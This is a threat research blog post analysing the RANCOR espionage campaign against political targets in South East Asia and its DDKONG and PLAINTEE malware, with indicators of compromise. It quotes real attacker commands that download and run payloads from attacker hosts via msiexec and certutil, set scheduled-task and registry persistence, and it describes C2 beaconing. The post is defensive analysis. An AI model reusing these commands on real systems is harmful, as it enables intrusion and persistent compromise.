[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  English
* [English](https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/ "Threat Research")
* [Malware](https://unit42.paloaltonetworks.com/category/malware/ "Malware")  
  [Malware](https://unit42.paloaltonetworks.com/category/malware/)

# RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 11 min read  
Related Products  
[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/product-category/advanced-wildfire/ "Advanced WildFire")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/product-category/cortex-xdr/ "Cortex XDR")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:
  
  * [Tom Lancaster](https://unit42.paloaltonetworks.com/author/tom-lancaster/)
  * [Brittany Barbehenn](https://unit42.paloaltonetworks.com/author/brittany-barbehenn/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:June 26, 2018

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [Malware](https://unit42.paloaltonetworks.com/category/malware/)
  * [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [DDKONG](https://unit42.paloaltonetworks.com/tag/ddkong/)
  * [KHRAT](https://unit42.paloaltonetworks.com/tag/khrat/)
  * [PLAINTEE](https://unit42.paloaltonetworks.com/tag/plaintee/)
  * [RANCOR](https://unit42.paloaltonetworks.com/tag/rancor/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/?pdf=download&lg=en&_wpnonce=0070e94fe3 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/?pdf=print&lg=en&_wpnonce=0070e94fe3 "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)

* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=RANCOR:%20Targeted%20Attacks%20in%20South%20East%20Asia%20Using%20PLAINTEE%20and%20DDKONG%20Malware%20Families&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families%2F "Share in email")

* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families%2F "Share in Facebook")

* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families%2F&title=RANCOR:%20Targeted%20Attacks%20in%20South%20East%20Asia%20Using%20PLAINTEE%20and%20DDKONG%20Malware%20Families "Share in LinkedIn")

* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families%2F&text=RANCOR:%20Targeted%20Attacks%20in%20South%20East%20Asia%20Using%20PLAINTEE%20and%20DDKONG%20Malware%20Families "Share in Twitter")

* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families%2F&ts=markdown "Share in Reddit")

* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=RANCOR:%20Targeted%20Attacks%20in%20South%20East%20Asia%20Using%20PLAINTEE%20and%20DDKONG%20Malware%20Families%20https%3A%2F%2Funit42.paloaltonetworks.com%2Funit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families%2F "Share in Mastodon")
  Throughout 2017 and 2018 Unit 42 has been tracking and observing a series of highly targeted attacks focused in South East Asia, building on our research into the [KHRAT Trojan](https://blog.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/). Based on the evidence, these attacks appear to be conducted by the same set of attackers using previously unknown malware families. In addition, these attacks appear to be highly targeted in their distribution of the malware used, as well as the targets chosen. Based on these factors, Unit 42 believes the attackers behind these attacks are conducting their campaigns for espionage purposes.  
  We believe this group is previously unidentified and therefore have we have dubbed it "RANCOR". The Rancor group's attacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and PLAINTEE. DDKONG is used throughout the campaign and PLAINTEE appears to be new addition to these attackers' toolkit. Countries Unit 42 has identified as targeted by Rancor with these malware families include, but are not limited to:

* Singapore

* Cambodia

We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages. These decoys contain details from public news articles focused primarily on political news and events. Based on this, we believe the Rancor attackers were targeting political entities. Additionally, these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case, Facebook.  
The malware and infrastructure used in these attacks falls into two distinct clusters, which we are labeling A and B, that are linked through their use of the PLAINTEE malware and several "softer" linkages.

Linking the attacks  
Building on our previous research into [KHRAT Trojan](https://blog.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/), we have been monitoring KHRAT command and control domains. In February 2018, several KHRAT associated domains began resolving to the IP address 89.46.222\[.\]97. We made this IP the center of our investigation.  
Examining passive DNS (pDNS) records from [PassiveTotal](https://www.riskiq.com/products/passivetotal/) revealed several domain names associated with this IP that mimic popular technology companies. One of these domains, facebook-apps\[.\]com, was identified in one of the malware samples associated with this IP address.  
The following table depicts the two malware samples that are directly related to this IP address:

|------------------------------------------------------------------|-----------------|-------------------------------------------------|
| **SHA256**                                                       | **Description** | **Connection to IP**                            |
| 0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855 | Loader          | C2 facebook-apps.com (resolves to 89.46.222.97) |
| c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d | PLAINTEE        | Hosted on 89.46.222.97                          |

Digging in further, the malware family we later named "PLAINTEE" appears to be quite unique with only six samples present in our data set.  
Apart from one sample (c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d), we were able to link all PLAINTEE samples together by the infrastructure they use. The diagram in Figure 1 shows the samples, domains, IP addresses and e-mail addresses that we identified during our investigation (See [Appendix B](#AppendixB) for more detail on these.) There is a clear split between Cluster A and Cluster B, with no infrastructure overlap between the two.  
![RANCOR\_1](https://blog.paloaltonetworks.com/wp-content/uploads/2018/06/RANCOR_1.png)

*Figure 1 - Diagram showing the split of PLAINTEE samples across the two clusters of activity.*

Our Investigation into both clusters further showed that they were both involved in attacks targeting organizations in South East Asia. Based on the use of the relatively unique PLAINTEE malware, the malware's use of the same file paths on in each cluster, and the similar targeting, we have grouped these attacks together under the RANCOR campaign moniker.

Delivery \& Loader mechanisms  
For many of the samples we've been unable to identify how they were delivered to end victims; however, in three cases we were able to locate the files used to deliver the Trojan, which we found merited more investigation and are briefly discussed below.

**Cluster A**  
Case 1: Delivery via document property macro -- a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483  
In our research we found at least one attack against a company leveraging a Microsoft Office Excel document with an embedded macro to launch the malware. Interestingly, the delivery document borrowed a technique which was [publicized in late 2017 as being used by the Sofacy threat actors](https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/), embedding the main malicious code in a EXIF metadata property of the document.  
By doing so, the main content of the macro itself (Figure 2) can be kept relatively simple, and the malicious' codes small footprint can help enable evasion of automated detection mechanisms based on macro content.  
![RANCOR\_2](https://blog.paloaltonetworks.com/wp-content/uploads/2018/06/RANCOR_2.png)

*Figure 2 -- The entire contents of the macro*

The 'Company' field in this case, contains the raw command that the attacker wishes to run, downloading and executing the next stage of the malware:  
cmd /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /i http://199.247.6.253/ud^",false,0 \<nul \> C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs \& schtasks /create /sc MINUTE /tn "Windows System" /tr "C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs" /mo 2 /F \& schtasks /create /sc MINUTE /tn "Windows System" /tr "C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs" /mo 2 /RU SYSTEM /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /i http://199.247.6.253/ud^",false,0 \<nul \> C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs \& schtasks /create /sc MINUTE /tn "Windows System" /tr "C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs" /mo 2 /F \& schtasks /create /sc MINUTE /tn "Windows System" /tr "C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs" /mo 2 /RU SYSTEM

|----------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 | cmd /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /i http://199.247.6.253/ud^",false,0 \<nul \> C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs \& schtasks /create /sc MINUTE /tn "Windows System" /tr "C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs" /mo 2 /F \& schtasks /create /sc MINUTE /tn "Windows System" /tr "C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs" /mo 2 /RU SYSTEM /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /i http://199.247.6.253/ud^",false,0 \<nul \> C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs \& schtasks /create /sc MINUTE /tn "Windows System" /tr "C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs" /mo 2 /F \& schtasks /create /sc MINUTE /tn "Windows System" /tr "C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs" /mo 2 /RU SYSTEM |

**Cluster B**  
Case 2: Delivery via HTA Loader - 1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458  
In this case the attackers sent an HTML Application file (.hta) to targets most likely as an email attachment. When opened and then executed, the key components of the HTA file downloads and executes further malware from a remote URLand loads a decoy image hosted externally (Figure 3).

![RANCOR\_3](https://blog.paloaltonetworks.com/wp-content/uploads/2018/06/RANCOR_3.png)

*Figure 3 -- The decoy image loaded when the .HTA file is executed.*

The decoy in Figure 3 strongly suggests the attackers were conducting an attack against a political entity in Cambodia. The Cambodia National Rescue Party is a politically motivated opposition movement.

**Case 3: Delivery via DLL Loader -**  
0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855  
We identified three unique DLL loaders during this analysis. The loaders are extremely simple with a single exported function and are responsible for executing a single command. An exemplar command is given below:  
cmd /c Echo CreateObject("WScript.Shell").Run "msiexec /q /i http:\\\\dlj40s.jdanief\[.\]xyz/images/word3.doc",0 \>%userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs /c Echo CreateObject("WScript.Shell").Run "msiexec /q /i http:\\\\dlj40s.jdanief\[.\]xyz/images/word3.doc",0 \>%userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs schtasks /create /sc MINUTE /tn "Windows Scheduled MaintenBa" /tr "wscript %userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs" /mo 10 /F /create /sc MINUTE /tn "Windows Scheduled MaintenBa" /tr "wscript %userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs" /mo 10 /F cmd /c certutil.exe -urlcache -split -f http:\\\\\\\\dlj40s.jdanief\[.\]xyz/images/1.pdf C:\\ProgramData\\1.pdf\&start C:\\ProgramData\\1.pdf /c certutil.exe -urlcache -split -f http:\\\\\\\\dlj40s.jdanief\[.\]xyz/images/1.pdf C:\\ProgramData\\1.pdf\&start C:\\ProgramData\\1.pdf

|-------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | cmd /c Echo CreateObject("WScript.Shell").Run "msiexec /q /i http:\\\\dlj40s.jdanief\[.\]xyz/images/word3.doc",0 \>%userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs /c Echo CreateObject("WScript.Shell").Run "msiexec /q /i http:\\\\dlj40s.jdanief\[.\]xyz/images/word3.doc",0 \>%userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs schtasks /create /sc MINUTE /tn "Windows Scheduled MaintenBa" /tr "wscript %userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs" /mo 10 /F /create /sc MINUTE /tn "Windows Scheduled MaintenBa" /tr "wscript %userProfile%\\AppData\\Local\\Microsoft\\microsoft.vbs" /mo 10 /F cmd /c certutil.exe -urlcache -split -f http:\\\\\\\\dlj40s.jdanief\[.\]xyz/images/1.pdf C:\\ProgramData\\1.pdf\&start C:\\ProgramData\\1.pdf /c certutil.exe -urlcache -split -f http:\\\\\\\\dlj40s.jdanief\[.\]xyz/images/1.pdf C:\\ProgramData\\1.pdf\&start C:\\ProgramData\\1.pdf |

In the above command, the malware is downloading and executing a payload and configuring it for persistent execution. In two of the three examples, the malware also downloads and opens a decoy PDF document hosted on a legitimate but compromised website. The decoy documents seen in these cases were related to Cambodian news articles, an example is shown in Figure 4 below.

![RANCOR\_4](https://blog.paloaltonetworks.com/wp-content/uploads/2018/06/RANCOR_4.png)

*Figure 4 - 1.pdf decoy delivered by downloader*

The decoy above discusses a recent event that took place against political party supporters in Cambodia, a similar theme to the decoy document observed in Figure 3.  
It is worth noting that the third DLL mentioned attempts to download the decoy document from a government website. This same website was used previously in a [KHRat campaign targeting Cambodian citizens](https://blog.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/).  
Additionally, two of the three DLL loaders were found to be hosted on this same compromised website, implying that it was likely compromised again in early 2018. The filenames for these two DLL loaders are as follows:

* Activity Schedule.pdf
* អ្នកនយោបាយក្បត់លើក្បត (Translated from Khmer: Politicians betrayed on the betrayal)

Malware Overview  
In all cases where we were able to identify the final payloads used, the DDKONG or PLAINTEE malware families were used. We observed DDKONG in use between February 2017 and the present, while PLAINTEE is a newer addition with the earliest known sample being observed in October 2017. It's unclear if DDKONG is only used by one threat actor or more than one based on the data available.  
In this section we'll go over the capabilities and operation of these malware families.

**DDKONG**  
For the analysis below, we used the following file:

|------------------|------------------------------------------------------------------|
| **SHA256**       | 119572fafe502907e1d036cdf76f62b0308b2676ebdfc3a51dbab614d92bc7d0 |
| **SHA1**         | 25ba920cb440b4a1c127c8eb0fb23ee783c9e01a                         |
| **MD5**          | 6fa5bcedaf124cdaccfa5548eed7f4b0                                 |
| **Compile Time** | 2018-03-14 07:20:11 UTC                                          |
| **File Type**    | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows          |

*Table 1 -- DDKONG sample analyzed in full.*

The malware in question is configured with the following three exported functions:

* ServiceMain
* Rundll32Call
* DllEntryPoint

The ServiceMain exported function indicates that this DLL is expected to be loaded as a service. If this function is successfully loaded, it will ultimately spawn a new instance of itself with the Rundll32Call export via a call to rundll32.exe.  
The Rundll32Call exported function begins by creating a named event named 'RunOnce'. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. If it's not, it dies. This ensures that only a single instance of DDKong is executed at a given time.  
DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3. Once decoded, the configuration contains the data shown in Figure 5 below.  
![RANCOR\_5](https://blog.paloaltonetworks.com/wp-content/uploads/2018/06/RANCOR_5.png)

*Figure 5 - Decoded configuration with fields highlighted*

After this configuration is decoded and parsed, DDKONG proceeds to send a beacon to the configured remote server via a raw TCP connection. The packet has a header of length 32 and an optional payload. In the beacon, no payload is provided, and as such, the length of this packet is set to zero.  
![RANCOR\_6](https://blog.paloaltonetworks.com/wp-content/uploads/2018/06/RANCOR_6.png)

*Figure 6 -- DDKONG beacon to remote C2*

After it sends the beacon, the malware expects a response command of either 0x4 or 0x6. Both responses instruct the malware to download and load a remote plugin. In the event 0x4 is specified, the malware is instructed to load the exported 'InitAction' function. If 0x6 is specified, the malware is instructed to load the exported 'KernelDllCmdAction' function. Prior to downloading the plugin, the malware downloads a buffer that is concatenated with the embedded configuration and ultimately provided to the plugin at runtime. An example of this buffer at runtime is below:

00000000: 43 3A 5C 55 73 65 72 73 5C 4D 53 5C 44 65 73 6B C:\\Users\\MS\\Desk  
00000010: 74 6F 70 5C 52 53 2D 41 54 54 20 56 33 5C 50 6C top\\RS-ATT V3\\Pl  
00000020: 75 67 69 6E 42 69 6E 00 00 00 00 00 00 00 00 00 uginBin.........uginBin.........  
\[TRUNCATED\]  
00000100: 00 00 00 00 43 3A 5C 55 73 65 72 73 5C 4D 53 5C ....C:\\Users\\MS\\  
00000110: 44 65 73 6B 74 6F 70 5C 52 53 2D 41 54 54 20 56 Desktop\\RS-ATT V  
00000120: 33 5C 5A 43 6F 6E 66 69 67 00 00 00 00 00 00 00 3\\ZConfig.......ZConfig.......  
\[TRUNCATED\]  
00000200: 00 00 00 00 00 00 00 00 00 40 00 00 F0 97 B5 01 .........@......

As we can see in the above text, two full file paths are included in this buffer, providing us with insight into the original malware family's name, as well as the author. After this buffer is collected, the malware downloads the plugin and loads the appropriate function. During runtime, the following plugin was identified:

|------------------|------------------------------------------------------------------|
| **SHA256**       | 0517b62233c9574cb24b78fb533f6e92d35bc6451770f9f6001487ff9c154ad7 |
| **SHA1**         | 03defdda9397e7536cf39951246483a0339ccd35                         |
| **MD5**          | a5164c686c405734b7362bc6b02488cb                                 |
| **Compile Time** | 2018-03-28 01:54:40 UTC                                          |
| **File Type**    | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows          |

*Table 2 -- Plugin downloaded during runtime for DDKong sample.*

This plugin provides the attacker with the ability to both list files and download/upload files on the victim machine.

PLAINTEE  
In total we have been able to find six samples of PLAINTEE, which, based on our analysis, seems to be exclusively used by the RANCOR attackers. PLAINTEE is unusual in that it uses a custom UDP protocol for its network communications. For this walk through, we use the following sample:

|------------------|------------------------------------------------------------------|
| **SHA256**       | c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d |
| **SHA1**         | 0bdb44255e9472d80ee0197d0bfad7d8eb4a18e9                         |
| **MD5**          | d5679158937ce288837efe62bc1d9693                                 |
| **Compile Time** | 2018-04-02 07:57:38 UTC                                          |
| **File Type**    | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows          |

*Table 3 -- PLAINTEE sample analyzed in full.*

This sample is configured with three exported functions:

* Add
* Sub
* DllEntryPoint

The DLL expects the export named 'Add' to be used when initially loaded. When this function is executed PLAINTEE executes the following command in a new process to add persistence:  
cmd.exe /c reg add "HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\ CurrentVersion\\RunOnce" /v "Microsoft Audio" /t REG\_SZ /d "%APPDATA%\\Network Service.exe" "\[path\_to\_PLAINTEE\]",Add /freg add "HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\ CurrentVersion\\RunOnce" /v "Microsoft Audio" /t REG\_SZ /d "%APPDATA%\\Network Service.exe" "\[path\_to\_PLAINTEE\]",Add /f

|-------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 | cmd.exe /c reg add "HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\ CurrentVersion\\RunOnce" /v "Microsoft Audio" /t REG\_SZ /d "%APPDATA%\\Network Service.exe" "\[path\_to\_PLAINTEE\]",Add /freg add "HKEY\_CURRENT\_USER\\Software\\Microsoft\\Windows\\ CurrentVersion\\RunOnce" /v "Microsoft Audio" /t REG\_SZ /d "%APPDATA%\\Network Service.exe" "\[path\_to\_PLAINTEE\]",Add /f |

Next, the malware calls the 'Sub' function which begins by spawning a mutex named 'microsoftfuckedupb' to ensure only a single instance is running at a given time. In addition, PLAINTEE will create a unique GUID via a call to CoCreateGuid() to be used as an identifier for the victim. The malware then proceeds to collect general system enumeration data about the infected machine and enters a loop where it will decode an embedded config blob and send an initial beacon to the C2 server.  
The configuration blob is encoded using a simple single-byte XOR scheme. The first byte of the string is used as the XOR key to in turn decode the remainder of the data.

Decoding this blob yields the following information, also found within the original binary:

|------------|-------------------------------------------------------------------------------------------------|
| **Offset** | **Description**                                                                                 |
| 0x4        | C2 port (0x1f99 -- 8089)                                                                        |
| 0x8        | C2 host (45.76.176\[.\]236)                                                                     |
| 0x10C      | Flag used to identify the malware in network communications. (default flag:4/2/2018 1:01:33 AM) |

*Table 4 -- Configuration stored in the malware.*

The malware then proceeds to beacon to the configured port via a custom UDP protocol. The network traffic is encoded in a similar fashion, with a random byte being selected as the first byte, which is then used to decode the remainder of the packet via XOR. An example of the decoded beacon is show in Figure 7.  
![RANCOR\_7](https://blog.paloaltonetworks.com/wp-content/uploads/2018/06/RANCOR_7.png)

*Figure 7 PLAINTEE example beacon*

The structure for this beacon is given in Table 5.

|------------|---------------------------------------------------------|
| **Offset** | **Description**                                         |
| 0x0        | Victim GUID (8C8CEED9-4326-448B-919E-249EEC0238A3)      |
| 0x25       | Victim IP Address (192.168.180.154)                     |
| 0x45       | Command (0x66660001)                                    |
| 0x49       | Length of payload (0x2f -- 47)                          |
| 0x4d       | Field 1 - Windows major version (0x6 -- Windows Vista+) |
| 0x51       | Field 2 - Windows minor version (0x1 -- Windows 7)      |
| 0x55       | Field 3 - Unknown (0x20)                                |
| 0x59       | Payload (default flag:4/2/2018 1:01:33 AM)              |

*Table 5 -- Beacon structure for PLAINTEE.*

This beacon is continuously sent out until a valid response is obtained from the C2 server (there is no sleep timer set). After the initial beacon, there is a two second delay in between all other requests made. This response is expected to have a return command of 0x66660002 and to contain the same GUID that was sent to the C2 server. Once this response is received, the malware spawns several new threads, with different Command parameters, with the overall objective of loading and executing a new plugin that is to be received from the C2 server.

During a file analysis of PLAINTEE in [WildFire](https://www.paloaltonetworks.com/products/secure-the-network/subscriptions/wildfire), we observed the attackers download and execute a plugin during the runtime for that sample. The retrieved plugin was as follows:

|------------------|------------------------------------------------------------------|
| **SHA256**       | b099c31515947f0e86eed0c26c76805b13ca2d47ecbdb61fd07917732e38ae78 |
| **SHA1**         | ac3f20ddc2567af0b050c672ecd59dddab1fe55e                         |
| **MD5**          | 7c65565dcf5b40bd8358472d032bc8fb                                 |
| **Compile Time** | 2017-09-25 00:54:18 UTC                                          |
| **File Type**    | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows          |

*Table 6 -- PLAINTEE plugin observed in Wildfire*

PLAINTEE expects the downloaded plugin to be a DLL with an export function of either 'shell' or 'file'. The plugin uses the same network protocol as PLAINTEE and so we were able to trivially decode further commands that were sent. The following commands were observed:

* tasklist
* ipconfig /all

The attacker performed these two commands 33 seconds apart. As automated commands are typically performed more quickly this indicates that they may have been sent manually by the attacker.

Conclusions  
The RANCOR campaign represents a continued trend of targeted attacks against entities within the South East Asia region. In a number of instances, politically motivated lures were used to entice victims into opening and subsequently loading previously undocumented malware families. These families made use of custom network communication to load and execute various plugins hosted by the attackers. Notably the PLAINTEE malwares' use of a custom UDP protocol is rare and worth considering when building heuristics detections for unknown malware. Palo Alto Networks will continue to monitor these actors, their malware, and their infrastructure going forward.  
Palo Alto Networks customers are protected against the threats discussed in this blog in the following ways:

* Wildfire correctly identifies all samples discussed as malicious.
* Traps appropriately blocks the malware from executing.
* AutoFocus customers may track this threat via the KHRAT, DDKONG, PLAINTEE, and RANCOR tags.

Additional mitigations that could help to prevent attacks like these from succeeding in your environment include:

* Changing the default handler for ".hta" files in your environment so that they cannot be directly executed.hta" files in your environment so that they cannot be directly executed.

Appendix A -- PLAINTEE older variant  
Older variants of PLAINTEE can be identified via the unique mutex created during runtime. At least three variants of PLAINTEE have been identified to date, however, the following two samples have additional unique differences:

|------------------------------------------------------------------|-----------------------------------------------------------------|-------------------|
| **++Hash++**                                                     | **++Functions++**                                               | **++Mutex++**     |
| bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e | helloworld helloworld1,helloworld2,sqmAddTostream,DllEntryPoint | microsoftfuckedup |
| 6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31 | helloworld helloworld1,helloworld2,sqmAddTostream,DllEntryPoint | microsoftfuckedup |

The following actions are performed with the additional functions:

* helloworld - performs actions identical to the newer sample's 'Sub' function

* helloworld1 -- accepts command-line arguments, performs a UAC bypass

* helloworld2 -- drops and compiles a mof filemof file

* sqmAddTostream -- expected to run initially by the malware, checks OS version and loads the malware with helloworld2

Appendix B

|--------------|------------------------------------------------------------------|-----------------|
| **++Type++** | **++Value++**                                                    | **++Cluster++** |
| **Loaders**                                                                                     |||
| Hash         | 0bb20a9570a9b1e3a72203951268ffe83af6dcae7342a790fe195a2ef109d855 | B               |
| Hash         | 1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458 | B               |
| Domain       | www.facebook-apps.com                                            | B               |
| Domain       | dlj40s.jdanief.xyz                                               | B               |
| IP           | 89.46.222.97                                                     | B               |
| Hash         | a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483 | A               |
| **PLAINTEE**                                                                                    |||
| Hash         | 863a9199decf36895d5d7d148ce9fd622e825f393d7ebe7591b4d37ef3f5f677 | A               |
| Hash         | 22a5bd54f15f33f4218454e53679d7cfae32c03ddb6ec186fb5e6f8b7f7c098b | A               |
| Hash         | c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d | B               |
| IP           | 199.247.6.253                                                    | A               |
| IP           | 45.76.176.236                                                    | A               |
| Mutex        | microsoftfuckedupb                                               | A               |
| Hash         | 9f779d920443d50ef48d4abfa40b43f5cb2c4eb769205b973b115e04f3b978f5 | A               |
| Hash         | bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e | A               |
| Hash         | 6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31 | A               |
| Hash         | b099c31515947f0e86eed0c26c76805b13ca2d47ecbdb61fd07917732e38ae78 | A               |
| Domain       | goole.authorizeddns.us                                           | A               |
| Mutex        | Microsoftfuckedup                                                | A               |
| IP           | 103.75.189.74                                                    | A               |
| IP           | 131.153.48.146                                                   | A               |
| **DDKONG**                                                                                      |||
| Hash         | 15f4c0a589dff62200fd7c885f1e7aa8863b8efa91e23c020de271061f4918eb | A               |
| Domain       | microsoft.authorizeddns.us                                       | A               |
| IP           | 103.75.191.177                                                   | A               |
| Hash         | 0f102e66bc2df4d14dc493ba8b93a88f6b622c168e0c2b63d0ceb7589910999d | A               |
| Hash         | 84607a2abfd64d61299b0313337e85dd371642e9654b12288c8a1fc7c8c1cf0a | A               |
